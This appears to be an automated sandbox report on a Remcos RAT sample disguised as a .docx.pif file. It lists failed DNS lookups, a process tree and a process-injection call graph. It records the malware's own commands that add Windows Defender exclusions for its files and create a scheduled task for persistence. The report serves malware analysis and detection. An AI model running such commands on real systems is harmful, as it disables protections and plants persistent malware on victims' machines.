                  Jul 3, 2024 08:56:49.069515944 CEST1.1.1.1192.168.2.50x273dName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:54.153686047 CEST1.1.1.1192.168.2.50x7af8Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:56:59.122919083 CEST1.1.1.1192.168.2.50x488cName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:03.403296947 CEST1.1.1.1192.168.2.50x1590Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:08.918978930 CEST1.1.1.1192.168.2.50xc2bcName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:13.593436003 CEST1.1.1.1192.168.2.50xcfa9Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:18.560497999 CEST1.1.1.1192.168.2.50xd8acName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:23.342292070 CEST1.1.1.1192.168.2.50xaef6Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:28.327120066 CEST1.1.1.1192.168.2.50x2b8aName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:33.323407888 CEST1.1.1.1192.168.2.50xc2acName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:38.325294971 CEST1.1.1.1192.168.2.50x3056Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:43.365637064 CEST1.1.1.1192.168.2.50xb1e6Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:48.494849920 CEST1.1.1.1192.168.2.50xd971Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:53.325556993 CEST1.1.1.1192.168.2.50x5141Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:57:58.326651096 CEST1.1.1.1192.168.2.50xaea1Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:03.330084085 CEST1.1.1.1192.168.2.50x8a29Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:08.325579882 CEST1.1.1.1192.168.2.50xde4cName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:13.324846029 CEST1.1.1.1192.168.2.50x7a2aName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:18.324537039 CEST1.1.1.1192.168.2.50x103dName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:23.327635050 CEST1.1.1.1192.168.2.50x1aa5Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:28.325026989 CEST1.1.1.1192.168.2.50x3027Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:33.325328112 CEST1.1.1.1192.168.2.50x8e0bName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:38.325536013 CEST1.1.1.1192.168.2.50xca69Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:43.329607964 CEST1.1.1.1192.168.2.50x4ce2Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:48.325776100 CEST1.1.1.1192.168.2.50x1082Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:53.327050924 CEST1.1.1.1192.168.2.50x4d67Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:58:58.322714090 CEST1.1.1.1192.168.2.50x3eafName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:03.324140072 CEST1.1.1.1192.168.2.50x3be7Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:08.324922085 CEST1.1.1.1192.168.2.50x25daName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:13.327971935 CEST1.1.1.1192.168.2.50x4e18Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:18.328504086 CEST1.1.1.1192.168.2.50x95beName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:23.328694105 CEST1.1.1.1192.168.2.50x7fe6Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:28.322148085 CEST1.1.1.1192.168.2.50x12ddName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:33.323002100 CEST1.1.1.1192.168.2.50x4a46Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:38.328473091 CEST1.1.1.1192.168.2.50xd9a7Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:43.427354097 CEST1.1.1.1192.168.2.50x1ad4Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:48.355978966 CEST1.1.1.1192.168.2.50x25fdName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:53.324678898 CEST1.1.1.1192.168.2.50x66c5Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 08:59:58.322719097 CEST1.1.1.1192.168.2.50x612bName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:03.323411942 CEST1.1.1.1192.168.2.50x468bName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:08.324614048 CEST1.1.1.1192.168.2.50x219aName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:13.323545933 CEST1.1.1.1192.168.2.50xab96Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:18.327438116 CEST1.1.1.1192.168.2.50xdb20Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:23.583151102 CEST1.1.1.1192.168.2.50xe2f4Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:00:28.325944901 CEST1.1.1.1192.168.2.50xeb7eName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:02:56:20
                  Start date:03/07/2024
                  Path:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
                  Imagebase:0x3d0000
                  File size:947'200 bytes
                  MD5 hash:A048AFA687356F7D1B0FC9375CA13D06
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:true

                  Target ID:3
                  Start time:02:56:22
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
                  Imagebase:0x7b0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:02:56:22
                  Start date:03/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:02:56:22
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"
                  Imagebase:0x7b0000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:02:56:22
                  Start date:03/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:02:56:22
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"
                  Imagebase:0x450000
                  File size:187'904 bytes
                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:02:56:22
                  Start date:03/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:02:56:23
                  Start date:03/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Imagebase:0x690000
                  File size:2'625'616 bytes
                  MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false

                  Target ID:10
                  Start time:02:56:23
                  Start date:03/07/2024
                  Path:C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
                  Imagebase:0x6c0000
                  File size:947'200 bytes
                  MD5 hash:A048AFA687356F7D1B0FC9375CA13D06
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 66%, ReversingLabs
                  • Detection: 60%, Virustotal, Browse
                  Reputation:low
                  Has exited:true

                  Target ID:11
                  Start time:02:56:24
                  Start date:03/07/2024
                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Imagebase:0x7ff6ef0c0000
                  File size:496'640 bytes
                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:02:56:26
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"
                  Imagebase:0x450000
                  File size:187'904 bytes
                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:13
                  Start time:02:56:26
                  Start date:03/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:02:56:26
                  Start date:03/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Imagebase:0x690000
                  File size:2'625'616 bytes
                  MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:15
                  Start time:02:56:26
                  Start date:03/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Imagebase:0x690000
                  File size:2'625'616 bytes
                  MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:moderate
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:11.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:181
                    Total number of Limit Nodes:10
                    execution_graph 40222 270abf0 40226 270ace3 40222->40226 40231 270ace8 40222->40231 40223 270abff 40227 270ace8 40226->40227 40228 270ad14 40227->40228 40236 270af80 40227->40236 40240 270af7b 40227->40240 40228->40223 40233 270acea 40231->40233 40232 270ad14 40232->40223 40233->40232 40234 270af80 LoadLibraryExW 40233->40234 40235 270af7b LoadLibraryExW 40233->40235 40234->40232 40235->40232 40237 270af94 40236->40237 40239 270afb9 40237->40239 40244 270a070 40237->40244 40239->40228 40241 270af94 40240->40241 40242 270a070 LoadLibraryExW 40241->40242 40243 270afb9 40241->40243 40242->40243 40243->40228 40245 270b160 LoadLibraryExW 40244->40245 40247 270b1d9 40245->40247 40247->40239 40279 270cf80 40280 270cfc6 40279->40280 40284 270d568 40280->40284 40287 270d558 40280->40287 40281 270d0b3 40290 270d1bc 40284->40290 40288 270d596 40287->40288 40289 270d1bc DuplicateHandle 40287->40289 40288->40281 40289->40288 40291 270d5d0 DuplicateHandle 40290->40291 40292 270d596 40291->40292 40292->40281 40293 4767845 40295 4767531 40293->40295 40294 4767540 40295->40294 40299 476a4e6 40295->40299 40304 476a480 40295->40304 40308 476a470 40295->40308 40300 476a474 40299->40300 40302 476a4e9 40299->40302 40312 476a7f0 40300->40312 40301 476a4a2 40301->40294 40302->40294 40305 476a49a 40304->40305 40307 476a7f0 12 API calls 40305->40307 40306 476a4a2 40306->40294 40307->40306 40309 476a474 40308->40309 40311 476a7f0 12 API calls 40309->40311 40310 476a4a2 40310->40294 40311->40310 40313 476a7fc 40312->40313 40326 476a827 40313->40326 40330 476abdd 40313->40330 40334 476ad11 40313->40334 40338 476b071 40313->40338 40345 476b050 40313->40345 40349 476ac53 40313->40349 40353 476ae74 40313->40353 40357 476a917 40313->40357 40362 476aac8 40313->40362 40368 476af6b 40313->40368 40375 476a92f 40313->40375 40380 476a922 40313->40380 40385 476b245 40313->40385 40390 476ad25 40313->40390 40398 476a8f8 40313->40398 40403 476b0da 40313->40403 40326->40301 40331 476abf7 40330->40331 40408 4766f80 40331->40408 40412 4766f78 40331->40412 40335 476ad12 40334->40335 40336 4766f80 ReadProcessMemory 40335->40336 40337 4766f78 ReadProcessMemory 40335->40337 40336->40335 40337->40335 40339 476aeda 40338->40339 40339->40338 40340 476b23f 40339->40340 40416 4766e90 40339->40416 40420 4766e8b 40339->40420 40424 4766dd0 40339->40424 40428 4766dc8 40339->40428 40340->40326 40346 476b06a 40345->40346 40347 4766f80 ReadProcessMemory 40346->40347 40348 4766f78 ReadProcessMemory 40346->40348 40347->40346 40348->40346 40350 476abdc 40349->40350 40351 4766f80 ReadProcessMemory 40350->40351 40352 4766f78 ReadProcessMemory 40350->40352 40351->40350 40352->40350 40355 4766e90 WriteProcessMemory 40353->40355 40356 4766e8b WriteProcessMemory 40353->40356 40354 476aea4 40355->40354 40356->40354 40358 476a8f9 40357->40358 40432 4767113 40358->40432 40436 4767118 40358->40436 40440 4766cf3 40362->40440 40444 4766cf8 40362->40444 40363 476aae2 40366 4766f80 ReadProcessMemory 40363->40366 40367 4766f78 ReadProcessMemory 40363->40367 40366->40363 40367->40363 40369 476aeda 40368->40369 40369->40368 40370 476b23f 40369->40370 40371 4766dd0 VirtualAllocEx 40369->40371 40372 4766dc8 VirtualAllocEx 40369->40372 40373 4766e90 WriteProcessMemory 40369->40373 40374 4766e8b WriteProcessMemory 40369->40374 40370->40326 40371->40369 40372->40369 40373->40369 40374->40369 40376 476a9a7 40375->40376 40376->40326 40378 4767113 CreateProcessA 40376->40378 40379 4767118 CreateProcessA 40376->40379 40377 476aa56 40377->40326 40378->40377 40379->40377 40381 476a8f9 40380->40381 40381->40326 40383 4767113 CreateProcessA 40381->40383 40384 4767118 CreateProcessA 40381->40384 40382 476aa56 40382->40326 40383->40382 40384->40382 40386 476b048 40385->40386 40387 476b356 40386->40387 40388 4766e90 WriteProcessMemory 40386->40388 40389 4766e8b WriteProcessMemory 40386->40389 40388->40386 40389->40386 40391 476ad2a 40390->40391 40392 476af4c 40391->40392 40394 4766cf3 Wow64SetThreadContext 40391->40394 40395 4766cf8 Wow64SetThreadContext 40391->40395 40393 476b410 40392->40393 40448 476b670 40392->40448 40453 476b65f 40392->40453 40393->40326 40394->40392 40395->40392 40399 476a8f9 40398->40399 40401 4767113 CreateProcessA 40399->40401 40402 4767118 CreateProcessA 40399->40402 40400 476aa56 40400->40326 40401->40400 40402->40400 40404 476b07c 40403->40404 40405 476b410 40404->40405 40406 476b670 2 API calls 40404->40406 40407 476b65f 2 API calls 40404->40407 40405->40326 40406->40404 40407->40404 40409 4766f82 ReadProcessMemory 40408->40409 40411 476700f 40409->40411 40411->40331 40413 4766f7c ReadProcessMemory 40412->40413 40415 476700f 40413->40415 40415->40331 40417 4766ed8 WriteProcessMemory 40416->40417 40419 4766f2f 40417->40419 40419->40339 40421 4766e90 WriteProcessMemory 40420->40421 40423 4766f2f 40421->40423 40423->40339 40425 4766e10 VirtualAllocEx 40424->40425 40427 4766e4d 40425->40427 40427->40339 40429 4766dd0 VirtualAllocEx 40428->40429 40431 4766e4d 40429->40431 40431->40339 40433 476711a CreateProcessA 40432->40433 40435 4767363 40433->40435 40435->40435 40437 47671a1 CreateProcessA 40436->40437 40439 4767363 40437->40439 40441 4766cf8 Wow64SetThreadContext 40440->40441 40443 4766d85 40441->40443 40443->40363 40445 4766d3d Wow64SetThreadContext 40444->40445 40447 4766d85 40445->40447 40447->40363 40449 476b685 40448->40449 40458 4766c43 40449->40458 40462 4766c48 40449->40462 40450 476b698 40450->40392 40454 476b670 40453->40454 40456 4766c43 ResumeThread 40454->40456 40457 4766c48 ResumeThread 40454->40457 40455 476b698 40455->40392 40456->40455 40457->40455 40459 4766c48 ResumeThread 40458->40459 40461 4766cb9 40459->40461 40461->40450 40463 4766c88 ResumeThread 40462->40463 40465 4766cb9 40463->40465 40465->40450 40255 2704668 40256 2704672 40255->40256 40258 2704763 40255->40258 40259 270477d 40258->40259 40263 2704863 40259->40263 40267 2704868 40259->40267 40265 2704868 40263->40265 40264 270496c 40264->40264 40265->40264 40271 27044b0 40265->40271 40268 270488f 40267->40268 40269 270496c 40268->40269 40270 27044b0 CreateActCtxA 40268->40270 40269->40269 40270->40269 40272 27058f8 CreateActCtxA 40271->40272 40274 27059bb 40272->40274 40275 270aed8 40276 270af20 GetModuleHandleW 40275->40276 40277 270af1a 40275->40277 40278 270af4d 40276->40278 40277->40276 40248 476b6f8 40249 476b883 40248->40249 40251 476b71e 40248->40251 40251->40249 40252 4768940 40251->40252 40253 476b978 PostMessageW 40252->40253 40254 476b9e4 40253->40254 40254->40251

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 296 7569039-756903e 297 7569046-7569049 296->297 298 7569040-7569042 296->298 300 756904a-7569071 297->300 299 7569044-7569045 298->299 298->300 299->297 384 7569071 call 7569488 300->384 385 7569071 call 7569479 300->385 302 7569077-75690d2 call 7565fb4 311 75690d5-75690ea 302->311 313 75690ec 311->313 314 75690f1-7569106 313->314 315 7569151-756919d 314->315 316 7569108 314->316 321 756919f 315->321 325 75691d8 315->325 316->313 316->315 317 7569236 316->317 318 7569137-7569139 316->318 319 7569274-75692c5 316->319 320 7569393-7569411 call 756e0a8 316->320 316->321 322 75691fd 316->322 323 756911a-7569135 316->323 324 756935a-756936d call 756b748 316->324 316->325 326 7569244 316->326 327 75691c2-75691d6 316->327 328 7569220-7569234 316->328 329 756910f-7569111 316->329 330 7569428-756942f 316->330 317->326 331 7569142 318->331 332 756913b-7569140 318->332 363 75692c7-75692cd 319->363 364 75692dd-756932f 319->364 375 7569418-7569423 320->375 335 75691a4-75691b9 321->335 336 7569202-7569217 322->336 323->314 386 7569372 call 756bf64 324->386 387 7569372 call 756bf84 324->387 388 7569372 call 756bfa4 324->388 325->322 334 7569249-756925e 326->334 327->335 328->336 329->311 337 7569113-7569118 329->337 340 7569147-756914f 331->340 332->340 334->330 342 7569264 334->342 335->325 345 75691bb 335->345 336->317 347 7569219 336->347 337->314 340->314 342->319 342->320 342->324 342->326 342->330 349 7569273 342->349 345->317 345->319 345->320 345->321 345->322 345->324 345->325 345->326 345->327 345->328 345->330 347->317 347->319 347->320 347->322 347->324 347->326 347->328 347->330 349->319 350 7569378-756937a call 756da88 354 7569380-756938e 350->354 354->334 365 75692d1-75692d3 363->365 366 75692cf 363->366 377 7569347-7569355 364->377 378 7569331-7569337 364->378 365->364 366->364 375->334 377->334 379 756933b-756933d 378->379 380 7569339 378->380 379->377 380->377 384->302 385->302 386->350 387->350 388->350
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: !Y3E$Teeq$Teeq$$eq$$eq$$eq$$eq
                    • API String ID: 0-3994094984
                    • Opcode ID: 782bcb106594f1ae39e7cfff9dfdb6791c3a490db7ff05684b91f3143bcbbac7
                    • Instruction ID: 98527d6ee28039fcb0a82015cf00baeeec4af8260a5f8bee05f6d37e0078b384
                    • Opcode Fuzzy Hash: 782bcb106594f1ae39e7cfff9dfdb6791c3a490db7ff05684b91f3143bcbbac7
                    • Instruction Fuzzy Hash: B8A1B0B4B102098FCB449B79C9597AE7BE3BBC8701F21846AE806DB394DF75EC058B41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: (oeq$(oeq$,iq$,iq$Hiq
                    • API String ID: 0-2750058203
                    • Opcode ID: 8ed65f3073800f2c8cbf4ba6cae2ded489379e7c2c0bd1b31bcd535774818308
                    • Instruction ID: e888cb0d97b10b3aa6636af9b69cfb5e4b5cb5657e35fb3dbddf4051ca56963c
                    • Opcode Fuzzy Hash: 8ed65f3073800f2c8cbf4ba6cae2ded489379e7c2c0bd1b31bcd535774818308
                    • Instruction Fuzzy Hash: 065273B5B0051A9FDB54DF69C498EAEBBB2FF84350F158159E8059B3A0DB30EC42CB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 697 7564a7c-7564a83 698 756512c-75651a8 697->698 699 7564a89-7564a93 697->699 706 75651f4 698->706 707 75651aa-75651d5 698->707 699->698 700 7564a99-7564ab3 699->700 702 7564a5b-7564a6f 700->702 703 7565125-756512b 702->703 704 7564a75-7564b26 702->704 704->702 709 75651d6-75651f3 706->709 710 75651f6-7565213 706->710 707->709 709->706 714 756521a 710->714 715 756521f-7565234 714->715 716 7565353-756539c 715->716 717 756523a 715->717 742 756539e call 7566207 716->742 743 756539e call 75661f7 716->743 744 756539e call 7566142 716->744 745 756539e call 7566260 716->745 746 756539e call 756611c 716->746 747 756539e call 75661ac 716->747 748 756539e call 756621d 716->748 749 756539e call 7566248 716->749 750 756539e call 75661d9 716->750 717->714 717->716 718 7565325-756533b 717->718 719 7565255-7565283 717->719 720 7565285-7565291 717->720 721 7565303-7565320 717->721 722 75652f3-75652fe 717->722 723 75652c0-75652d9 717->723 724 7565241-7565245 717->724 725 75652de-75652ee 717->725 726 75652a9-75652bb 717->726 737 7565343-756534e 718->737 719->715 738 7565299-75652a4 720->738 721->715 722->715 723->715 727 7565247-756524c 724->727 728 756524e 724->728 725->715 726->715 730 7565253 727->730 728->730 730->715 737->715 738->715 741 75653a4-75653ad 742->741 743->741 744->741 745->741 746->741 747->741 748->741 749->741 750->741
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
